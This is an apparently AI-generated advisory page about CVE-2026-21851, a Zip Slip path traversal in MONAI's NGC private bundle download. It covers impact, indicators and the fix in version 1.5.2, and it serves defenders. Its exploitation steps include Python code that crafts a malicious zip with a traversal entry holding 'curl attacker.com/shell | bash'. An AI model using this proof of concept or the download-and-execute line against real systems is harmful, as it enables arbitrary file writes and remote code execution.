CVE-2026-21851: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-21851 is a Path Traversal (Zip Slip) vulnerability in the MONAI (Medical Open Network for AI) framework's _download_from_ngc_private() function. The function calls zipfile.ZipFile.extractall() without validating archive member paths, allowing a maliciously crafted zip file to write files outside the intended extraction directory. All MONAI versions up to and including 1.5.1 (pip package) are affected; the issue was fixed in version 1.5.2. The vulnerability was disclosed on January 6, 2026, and has a CVSS v3.1 base score of 5.3 (Moderate) (Github Advisory, MONAI Security Advisory).

Technical details

The root cause is CWE-22 (Improper Limitation of a Pathname to a Restricted Directory): the _download_from_ngc_private() function in monai/bundle/scripts.py (lines 291–292) calls z.extractall(extract_path) directly without validating that archive member paths remain within the target directory. This is an implementation oversight — MONAI already provides a safe_extract_member() function in monai/apps/utils.py that checks for absolute paths and .. traversal sequences, and all other download functions (_download_from_github(), _download_from_monaihosting(), _download_from_bundle_info()) use this safe wrapper. An attacker who controls an NGC private repository can craft a zip archive containing entries with path traversal sequences (e.g., ../../../tmp/malicious_file) that, when extracted by the vulnerable function, write files to arbitrary filesystem locations. Exploitation requires the attacker to control or compromise an NGC private repository, the victim to configure MONAI with source="ngc_private", and user interaction to trigger the download (MONAI Security Advisory, Github Advisory).

Impact

Successful exploitation allows an attacker to write arbitrary files to any location on the filesystem accessible to the user running MONAI, limited by the process's OS-level permissions. The primary impact is to integrity — critical system files, configuration files, or application code could be overwritten, or malicious scripts could be planted for later execution. There is no direct confidentiality or availability impact as defined by the CVSS score, but file overwrites could indirectly enable code execution or persistent access depending on the target location and permissions (MONAI Security Advisory, Github Advisory).

Exploitability

A proof-of-concept script is publicly documented in the GitHub security advisory, demonstrating creation of a malicious zip with path traversal entries and the difference in behavior between the vulnerable and safe extraction patterns. However, there is no evidence of active in-the-wild exploitation or threat actor attribution at this time. The EPSS score is approximately 0.013% (2nd percentile), indicating a low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for the attacker to control an NGC private repository and for the victim to use the ngc_private download source (Github Advisory, MONAI Security Advisory).

Exploitation steps

  1. Control an NGC Private Repository: The attacker must gain control of or compromise an NVIDIA NGC private repository that a target MONAI user is configured to download bundles from.
  2. Craft a Malicious Zip Archive: Create a zip file containing both legitimate bundle files and path traversal entries, e.g., using Python:
import zipfile, io
zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zf:
    zf.writestr('monai_test_bundle/configs/metadata.json', '{"name": "test_bundle"}')
    zf.writestr('../../../tmp/malicious_payload.sh', '#!/bin/bash\ncurl attacker.com/shell | bash')
with open('malicious_bundle.zip', 'wb') as f:
    f.write(zip_buffer.getvalue())
  1. Host the Malicious Bundle: Upload the crafted zip to the controlled NGC private repository, replacing or supplementing a legitimate bundle.
  2. Trigger Victim Download: Wait for or socially engineer the victim to execute a MONAI bundle download using source="ngc_private", which calls _download_from_ngc_private() and invokes the vulnerable z.extractall() without path validation.
  3. Achieve Arbitrary File Write: The malicious zip entry (e.g., ../../../tmp/malicious_payload.sh) is extracted outside the intended directory, writing attacker-controlled content to the target path with the permissions of the MONAI process (MONAI Security Advisory).

Indicators of compromise

  • File System: Unexpected files appearing outside the MONAI bundle extraction directory (e.g., in /tmp, home directories, or system directories) with timestamps coinciding with a MONAI NGC private bundle download; files with names matching bundle artifacts but located in anomalous paths.
  • Logs: MONAI application logs showing _download_from_ngc_private() activity (log entries such as Downloading: <path>_v<version>.zip and Writing into directory: <extract_path>) followed by unexpected file creation events in unrelated directories.
  • Process: Unexpected script execution or shell processes spawned shortly after a MONAI bundle download, particularly if extracted files include executable scripts placed in locations like cron directories or shell profile paths.
  • Network: Outbound connections from the MONAI host to unknown external IPs shortly after an NGC private bundle download, which may indicate execution of a dropped payload (MONAI Security Advisory).

Mitigation and workarounds

Upgrade MONAI to version 1.5.2 or later, which replaces the unsafe zipfile.ZipFile.extractall() call in _download_from_ngc_private() with the existing _extract_zip() utility that validates member paths before extraction (commit 4014c84) (MONAI Patch Commit, Github Advisory). As a temporary workaround if patching is not immediately possible, avoid using source="ngc_private" for bundle downloads and restrict downloads to trusted, verified sources. Additionally, run MONAI processes with the least-privileged user account to limit the impact of any successful file write.

Community reactions

The vulnerability was reported by researcher yueyueL and analyzed by MONAI maintainer ericspod, who published the security advisory on January 6, 2026. The fix was merged promptly and included in the MONAI 1.5.2 release on January 29, 2026. No significant broader media coverage or notable community controversy has been observed beyond the standard advisory and patch process (MONAI Security Advisory, Github Advisory).

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management